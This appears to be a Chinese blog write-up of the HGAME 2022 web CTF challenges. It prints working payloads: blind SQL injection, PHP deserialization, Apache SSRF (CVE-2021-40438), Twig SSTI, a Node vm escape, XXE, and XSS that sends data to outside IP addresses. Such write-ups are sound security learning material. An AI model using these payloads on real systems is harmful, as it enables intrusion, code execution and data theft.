HGAME 2022 WEB

最新推荐文章于 2024-05-16 17:47:49 发布
最新推荐文章于 2024-05-16 17:47:49 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: 笔记 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/122992233
版权

前言

web篇

Tetris plus


直接搜索alert

Fujiwara Tofu Shop

添加一些头部信息,X-Real-IP: 127.0.0.1

蛛蛛…嘿嘿♥我的蛛蛛

import requests
from lxml import etree

url = 'https://hgame-spider.vidar.club/be26bf4bdf'
r = requests.get(url).text
htmltxt = etree.HTML(r)
key = htmltxt.xpath("//a/@href")
Key = ''.join(key)

for i in range(110):
    print(url+Key)
    r = requests.get(url+Key).text
    htmltxt = etree.HTML(r)
    key = htmltxt.xpath("//a/@href")
    Key = ''.join(key)
    if 'game' in r:
        print("success!"+r)
        break

第100个包,头部信息

easy_auth

jwt没密钥直接换0

webpack-engine

Webpack打包网站,细心点搜一下源码


Flag: hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}

一本单词书

username=adm1n&password=1080a 弱比较绕过登录


save.php可以操作session文件


get.php可以反序列化


由于数据处理时为 json_decode 所以 键值对的键可控,注入session文件,反序列化读取文件
Payload

{
	"y0ng|O:4:\"Evil\":2:{s:4:\"file\";s:5:\"/flag\";s:4:\"flag\";N;}":1
}

访问get.php触发反序列化


Flag:hgame{Uns@f3_D3seR1@liz4t1On!Is~h0rr1b1e-!n_PhP}

Apache!


附件 Default.conf 发现 flag路径


搜索相关cve,2021 年 Apache 的 mod_proxy 模块报了个 SSRF 漏洞(CVE-2021-40438),Apache httpd Server CVE-2021-40438 漏洞分析, 用来ssrf探测内网,这题设置了 /proxy的代理服务

Payload

GET /proxy?unix:A*6409|http://127.0.0.1:60010/flag HTTP/1.1
Host: 127.0.0.1:8787
User-Agent: curl/7.64.1
Accept: */*


Flag:hgame{COng@tul4ti0n~u_r3prOduced_CVE-2021-40438}

Pokemon

error.php二分法盲注,过滤 =like绕过

import requests

url = "http://121.43.141.153:60056/error.php?code="

result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        #payload = "if(ascii(substr(database(),%d,1))>%d,404,403)" % (i , mid)
        payload = "if(ascii(substr((selselectect/*/**/*/flag/*/**/*/frfromom/*/**/*/fllllllllaaaaaag),%d,1))>%d,404,403)" % (i, mid)
        #payload = "if(ascii(substr((selselectect/*/**/*/group_concat(column_name)frfromom(infoorrmation_schema.columns)whwhereere(table_name/*/**/*/like/*/**/*/'fllllllllaaaaaag')),%d,1))>%d,404,403)" % (i, mid)

        r = requests.get(url + payload)
        #r.encoding = "utf-8"
        # print(url+payload)
        if "404" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

Flag:hgame{C0n9r@tul4tiOn#Y0u$4r3_sq1_M4ST3R^}

At0m的留言板

  • xss

给了一个html模板,发现flag在 <head> 标签中被定义


题目环境是在微信平台,发送paylaod会返回代码执行的截图,禁用了一些常见xss,本来思路是让flag回显到平台,然后得到截图就行了,但是可能是截图太快,或者其他原因,不回显,所以只能外带数据


以下是部分测试payload


</span><img src=”111” onerror=alert(1)><span>

</span><a onload="document.location='http\://150.158.181.145:8000/?'+flag;">xss link\</a><span>


<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAAAAAElFTkSuQmCC" onload="window.open('http\://150.158.181.145:8000/?'+flag);" width="336" height="36">

 
<span id="msg"><video src="111" onerror="document.getElementById('msg').innerHTML=flag;"></span>


<span id="msg"><audio controls onloadeddate="document.getElementById('msg').innerHTML=flag;"><source src=https://www.w3school.com.cn/i/horse.mp3 type="audio/mpeg"></audio></span>


<span id="msg"><audio controls oncanplay="document.getElementById('msg').innerHTML=flag;"><source src="https://www.w3school.com.cn/i/horse.mp3" type="audio/mpeg"></audio></span>


<img src=x onerror=document.body.appendChild(document.createElement('script')).src='http://1.116.110.61:8000/1.js'><audio controls oncanplay="haiCoder()"><source src="https://www.w3school.com.cn/i/horse.mp3" type="audio/mpeg"></audio>

然后就是 利用img的src获取script中的数据然后外带数据

payload

<img src=x onerror="window.open('http://1.116.110.61/'+document.getElementsByTagName('head')[0].getElementsByTagName('script')[0].text)" width="336" height="36">
或者
<img src=x onerror=document.body.appendChild(document.createElement('script')).src='http://1.116.110.61/'+document.getElementsByTagName('head')[0].getElementsByTagName('script')[0].text>

Flag:hgame{Xs5_1s_so_int3Restin9!Var_is_0uT_of_d4te}

wp解法:

本题设计的思路是 获取到全局的变量名,然后找到 flag 的变量名再拿到 flag。

这也是模板html的提示点:为什么同样是两个变量,第一个使用 let,而第二个使用 var 呢?因为 使用 var 可
以利用 Object.keys(window) 拿到全局变量 flag 的变量名,而使用let的话无法获取。

<img src=1 onerror="document.getElementsByClassName('content')[0].innerText=Object.keys(window)">


再用

<img src=1 onerror="document.getElementsByClassName('content')[0].innerText =F149_is_Here">

总结:
由于我对于html返回对象那里基础薄弱,所以在找html中的script标签时费了很大力气然后就是在控制台进行测试


慢慢的找出对应的节点,获取文本
知识点:

  1. var elements = document.getElementsByTagName(name); 返回集合
  2. getElementsByTagName('script') 在寻找标签为script的节点

相关文章

XSS过滤绕过总结 - 随风kali - 博客园 (cnblogs.com)

XSS漏洞之加载远程js文件

XSS漏洞之加载远程js文件

document对象

HTMLElement

工作中梳理XSS Bypass WAF相关Payload - Fly 我是小灰灰 (yaofeifly.github.io)

xss绕waf几种姿势剖析 (qq.com)

Bypass XSS SQL Payload大全 (qq.com)

Vidar shop demo

注册用户然后发现账户有9999元,商店里面flag需要1w


应该就是逻辑漏洞或者竞争,点击flag商品和其他一个商品进行下单,先把40的支付一下


发现点击删除按钮后会取消订单,退还钱,抓包看看


发现当点击删除时,发起一个对应ID的包,将id改为flag对应id 2637放包发现退还了1w,再次购买flag,成功


Flag:hgame{8f8ddb3537b037a296a85e920d54f650b4a6cc73b015ac0bdb91a579a193aa71}

SecurityCenter

  • Twig SSTI

发现泄露 /vendor/composer/installed.json,使用了twig的框架,发现一个疑似ssrf地方

经过测试存在SSTI

TWIG 全版本通用 SSTI payloads

Payload:

{{["id",%200]|sort("system")|join(",")}}

{{[%22base64+/f*%22,%200]|sort(%22system%22)|join(%22,%22)}}

FLAG: hgame{!Tw19-S5t11s^s00O0O_inter3st1n5~!}

LoginMe


Sqlmap直接跑出来了。。。

python3 sqlmap.py -r c:\Users\cys\Desktop\sql.txt --batch --random-agent -T uuussseeerrrsss -C password --dump –flush

登录得flag

FLAG: hgame{d0490213241f3f29f172c475e1641a7d37bf2b8208616c4d4489aa58a1ebaeb4}

Markdown Online

学习到了markdown xss nodejs vm逃逸 过滤

先看导入了什么,markdown-itzombie


Zombie存在一个沙箱逃逸的rce漏洞,找到了出题人之前写过的一篇文章,与祥云杯的 cralwer_z 类似

Nodejs Zoombie Package RCE 分析

看一下登录控制器,密码转换为大写后要与54g相等,这是不可能的


登录处只要让 toUpperCase 抛出异常就可以登陆成功,让password为数组即可使其长度为16绕过

{"username":"admin","password":["1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1"]}


接着审计提交的控制器


先将传入的代码进行md渲染编程html,接着利用Browser中的load进行操作


load又调用了this.tabs.open({ html: html }) 其实这里的 open 就是漏洞的入口


剩下分析移步Nodejs Zoombie Package RCE 分析

祥云杯是通过visit为入口,这道题是以load为入口,那整体就是,将传入的代码在提交之后渲染为html,然后放入沙箱中运行,让其逃逸即可,这里还需要markdown的语法

发现在 vm 模块运行js代码,代码运行的上下文是 window对象


但是这里存在一个waf

function waf(code) {
    const blacklist = /__proto__|prototype|\+|atlert|confirm|escape|parseInt|parseFloat|prompt|isNaN|new|this|process|constructor|atob|btoa|apk/i
    if (code.match(blacklist)) {
        return "# Hacker!"
    } else {
        return code
    }
}

过滤了关键词,给出两种 绕过,当我想要以相同方式 绕过this时,发现对于this不适用,然后找到了这篇文章

nodejs沙箱与黑魔法 - 先知社区 (aliyun.com)

尝试调用 window 的方法 然后调用 constructor 向上 返回的一个 Function constructor 然后 利用Function对象构造一个函数并执行

Payload:

<script>
var a='const';var b='ructor';var c=[a,b].join('');
var d='return p';var e='rocess';var f=[d,e].join('');
var h='child_p';var i=[h,e].join('');
var j='th';var k='is';var l=[j,k].join('');
x= clearImmediate [c][c][c][c](f)();y=x.mainModule.require(i);z=y.execSync('whoami').toString();document.write(z);
</script>

或者

<script>
var h='child_p';var e='rocess';var i=[h,e].join('');
x=clearImmediate[`${`${`constructo`}r`}`][`${`${`constructo`}r`}`][`${`${`constructo`}r`}`]([`${`${`return proces`}s`}`])();y=x.mainModule.require(i);z=y.execSync('cat /flag').toString();document.write(z);
</script>

Flag:hgame{3nj0y*Th3/pR0tOtype/pOllut10n!1n_j@v4scr1pt}

后续测试,构造一个constructor即可,成功的window方法:

btoa、cancelAnimationFrame、captureEvents、clearImmediate,print等等可以自行寻找

window方法:clearImmediate()_w3cschool

相关文章:
Markdown xss payload
Markdown-XSS-Payloads.txt

nodejs 沙盒逃逸
Node.js沙盒逃逸分析
nodejs-vm沙箱逃逸
NodeJs 沙盒逃逸分析及原型链的简单学习

nodejs编码:
Nodejs的一些技巧
nodejs代码执行绕过的一些技巧汇总

vm2逃逸payload项目
https://github.com/patriksimek/vm2

Comment

  • xxe


libxml_disable_entity_loader(false); 允许外部实体,waf了一些关键字

返回flag的逻辑就是sender需要为admin,但是post数据包里不能有admin关键字


本想在content通过一百万个字符绕过preg_match,然后发现题目环境不可以,那就进行外部实体拼接绕过
payload

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe "ad" >
<!ENTITY xxe2 "min" >]>
<comment><sender>&xxe;&xxe2;</sender><content>123</content></comment>

Flag:hgame{Pr3ud0~prOtQc4l*m33ts_Xx3-!nj3cti0n~!}

FileSystem

  • go安全

两个文件

Main.go

package main

import (
	"log"
	"net/http"
)

func fileHandler(w http.ResponseWriter, r *http.Request) {
	http.FileServer(http.Dir("./")).ServeHTTP(w, r)
}

func main() {
	http.HandleFunc("/", fileHandler)
	http.HandleFunc("/there_may_be_a_flag", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte(`No! You can't see the flag!`))
	})
	log.Fatal(http.ListenAndServe(":8889", nil))
}

there_may_be_a_flag 就是flag的地方,加上了web服务的flag路由,从而使得我们没法通过直接访问/flag来获取文件。而是得到/flag路由的回显。也就是 No! You can’t see the flag!

审计完再结合题目觉得应该是 http.FileServer(http.Dir("./")).ServeHTTP(w, r),出了问题,应该是存在漏洞导致可以跨目录读取到flag,搜索了一下,找到了go的一些安全问题

golang的一些安全问题

随后发现了漏洞的出处 justCTF [*] 2020:Go-fs,出题人在github提交了issue,https://github.com/golang/go/issues/40940

在ctf中还出现了非预期解法,利用一下非预期来解一下题目

payload

curl -X CONNECT --path-as-is http://3445d0f8a3.filesystem.hgame.homeboyc.cn/123/../there_may_be_a_flag


非预期的原理:
如果是 CONNECT 方式请求,就 不会处理url中的特殊字符,导致直接读取flag.其他的请求方法都会在cleanPath中被处理url,golang1.16似乎已经处理了。

Ff.cheng
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
我对HGAME的看法(GalGame
大师的资源
02-15 9426
堕落了,居然下载18禁的GalGame顺便谈谈我对 HGAME的看法HGAME,我也局限于studio e go的游戏更准确地说是18禁的GalGame(美少女游戏)看看网上:切随便找个 GAL 游戏美女都多的要不成 GAL全是H的 日本游戏没H的少死了 在日本大家都玩PS PC游戏市场都被H的占领了 所以PC游戏就是HGAME 想玩HGAME 就说嘛(http://zhidao.baid
HGAME 2024 WEEK2 Web方向题解 全_what the cow say
最新发布
2301_82056337的博客
05-16 380
/获取cookie(flag)window.open(“http://”+a+“.kbqsag.ceye.io”);}}{{else}}{{end}} go中的if-else语法类似,条件选择。“text/template” // 用于处理文本模板,存在XSS!setTimeout(function(){ //延时1s执行。
hgame是什么?【详解】 【我们不能光玩game,而不了解game的文化】
FreeXploiT
05-15 1万+
allyesno:今天偶闻hgame资深人士swan对hgame的言论 [12:23] 最开始的那种游戏,出现图片的时候你要按h键才能往下显示[12:24] 后来就用h-game代替了[12:24] 然后发展到hentai[12:24] 这个是日文变态的意思~嘿嘿,不过是现有h才有hentai的下面我们来看看一篇更详细的说明 希望对大家以后提高玩hgame的水平有帮助H-gam
本世纪最经典好文---新系统下经典老游戏[中文HGAME]重玩全攻略(感谢作者)
热门推荐
lanji1988的专栏
04-10 3万+
送给所有爱玩游戏的老鸟们 老游戏中有大量经典作品,其中中文的HGAME更是经典中的经典! ◆ 告别的年代 失色的回忆?——新系统下经典老游戏重玩全攻略 ◆  “新”与“老”当然是相对的,不过在开篇之前有必要确定我们的讨论范畴,这里的“老”是指为Win98之前的操作系统,包括DOS和Win32/95,而新系统则是指Win98/2000/XP。毫无疑问,有很多老游戏都很值得我们来重温,但重
HGAME2021 - 梦的开始
anwen12的博客
03-01 2188
HGAME2021 - 梦的开始 WEB 0x01 200OK! 参考链接:https://blog.csdn.net/anwen12/article/details/113728065 0x02 LazyDogR4U 一个简单的代码审计类的问题 这是提示 这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。 0x03 LIKI的生日礼物 题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
0hgame:用0h制作的游戏->阅读README
05-01
0h游戏卡纸我在2014年10月26日凌晨02:00开始了这个项目,并在2014年10月26日凌晨02:00完成了该项目。 没有时间的游戏? 是的! 好好享受! (对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
HGAME 2023 Week1
ph0ebus的博客
01-13 2188
Week1的大多数题对我这样的萌新还是很友好的,虽然但是还是很多没解出来,不过还是学到了蛮多东西,浅浅记录一下。
GV:GV 个人网站的存储库
06-30
gonzalovazquez.ca 的主要存储库作者:Gonzalo Vazquez
CTF-RE-わかります(hgame2018)
SuperGate的博客
01-27 2191
Hgame week1里面应该说是最难的一个题。 主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位,v7则是后4位,这里的位是二进制位。 然后分别将两个dword_6021xx数组找出来,点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。 其中v9生成函数比较容易求出v9,v...
hgame2023-week3
247533的博客
02-01 858
过年 打麻将 摆烂。
Hgame
忙碌者的博客
02-06 5196
Hgame WEEK1 1.换头大作战 题目地址 题目首先是这样一个界面,既然让我提交,那自然要提交试试,随便填个1进去提交试试。 提交完提示: request method is error.I think POST is better 既然让我POST,果断调出HACKBAR,同时注意到url后面多了个want变量,自然想到去POST这个want。 构造want=1,RUN,得到下图:需要lo...
HGAME2019 WEB happyPHP
stepone4ward的博客
03-01 1259
虽然比赛已经结束了,但是不会的题目还是要及时学习的,题目直接给出了提示是使用Laravel框架进行编写的,刚开始接触这道题目的时候,一直在百度Laravel框架的漏洞,甚至没有去尝试用户注册和登陆也就没有得到源码了。。。 f12查看元素 得到作者在github上留下的源码,在SessionsController.php中得到关键的注入语句 尝试在登陆界面进行注入获取admin的邮箱,paylo...
HGAME2021-week1-wp
qq_50438521的博客
02-07 5384
HGAME2021-week1-wp 1. Web_watermelon 链接:http://watermelon.ryen.xyz:800/ 本题是一个合成大西瓜的小游戏,过2000分拿到flag。 打开这个界面我人都是懵的,这是啥??下面的堆积的界面完全看不到,然后我就瞎子摸象,玩了不下五次,没有一次超过300分。真的!!!作为一个游戏黑洞,加上我从来没玩过它,让我不作弊是不可能的。 所以在火狐浏览器中找到web开发者,在查看器中更改界面,把红线提高,要让红线高就要让界面窄一点,深一点。 (如图所示)
HGAME-week2-web-wp
静仙的博客
02-18 3386
web萌新的ctf之旅
HGAME部分wp只玩了前两周
qq_49354488的博客
03-11 1032
第一周 MISC Base全家福 新年即将来临之际,Base家族也团聚了,他们用他们特有的打招呼方式向你问了个好,你知道他们在说什么吗? R1k0RE1OWldHRTNFSU5SVkc1QkRLTlpXR1VaVENOUlRHTVlETVJCV0dVMlVNTlpVR01ZREtSUlVIQTJET01aVUdSQ0RHTVpWSVlaVEVNWlFHTVpER01KWElRPT09PT09 解密base64 解密base32 16转字符串 hgame{We1c0me_t0_HG4M3_2021}
hgamewriteup
03-01
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值